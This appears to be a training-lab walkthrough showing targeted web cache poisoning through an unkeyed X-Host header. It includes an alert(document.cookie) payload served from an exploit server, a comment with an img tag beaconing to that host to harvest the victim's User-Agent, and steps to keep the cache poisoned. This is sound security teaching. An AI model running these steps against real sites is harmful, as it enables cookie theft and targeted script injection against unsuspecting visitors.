Targeted web cache poisoning using an unknown header

Description

This lab is vulnerable to web cache poisoning. A victim user will view any comments that you post.

Reproduction

  1. With Burp running, load the website’s home page.

  2. In Burp, go to Proxy -> HTTP history and study the requests and responses generated. Find the GET request for the home page.

  3. With the Param Miner extension enabled, right-click on the request and select Guess headers. After a while, Param Miner will report that there is a secret input in the form of the X-Host header.

  4. Send the GET request to Burp Repeater and add a cache-buster query parameter, such as ?cb=1234.

  5. Add the X-Host header with an arbitrary hostname, such as example.com. The value of this header is used to dynamically generate an absolute URL for importing the JavaScript file stored at /resources/js/tracking.js.

  6. Go to the exploit server and change the file name to match the path used by the vulnerable response:

/resources/js/tracking.js

  1. In the body, enter the payload alert(document.cookie) and store the exploit.

  2. Go back to the request in Burp Repeater and set the X-Host header with the exploit server url:

X-Host: your-exploit-server-id.web-security-academy.net

  1. Send the request until you see the exploit server URL reflected in the response and X-Cache: hit in the headers.

  2. To simulate the victim, load the URL in your browser and make sure that the alert() fires.

  3. The Vary header is used to specify that the User-Agent is part of the cache key. To target the victim, you need to find out their User-Agent.

  4. On the website, notice that the comment feature allows certain HTML tags. Post a comment containing a suitable payload to cause the victim’s browser to interact with your exploit server, for example:

<img src="https://exploit-0a21009d04709c47c10d2f60017e00dc.exploit-server.net/foo" />

  1. Go to the blog page and double-check that your comment was successfully posted.

  2. Go to the exploit server and click the button to open the Access log. Refresh the page every few seconds until you see requests made by a different user. This is the victim. Copy their User-Agent from the log.

  3. Go back to your malicious request in Burp Repeater and paste the victim’s User-Agent into the corresponding header. Remove the cache buster.

  4. Keep sending the request until you see your exploit server URL reflected in the response and X-Cache: hit in the headers.

  5. Replay the request to keep the cache poisoned until the victim visits the site and the lab is solved.

PoC

Exploitability

An attacker will need to poison the cache with a response that executes alert(document.cookie) in the visitor’s browser; and also needs to make sure that the response is served to the specific subset of users to which the intended victim belongs.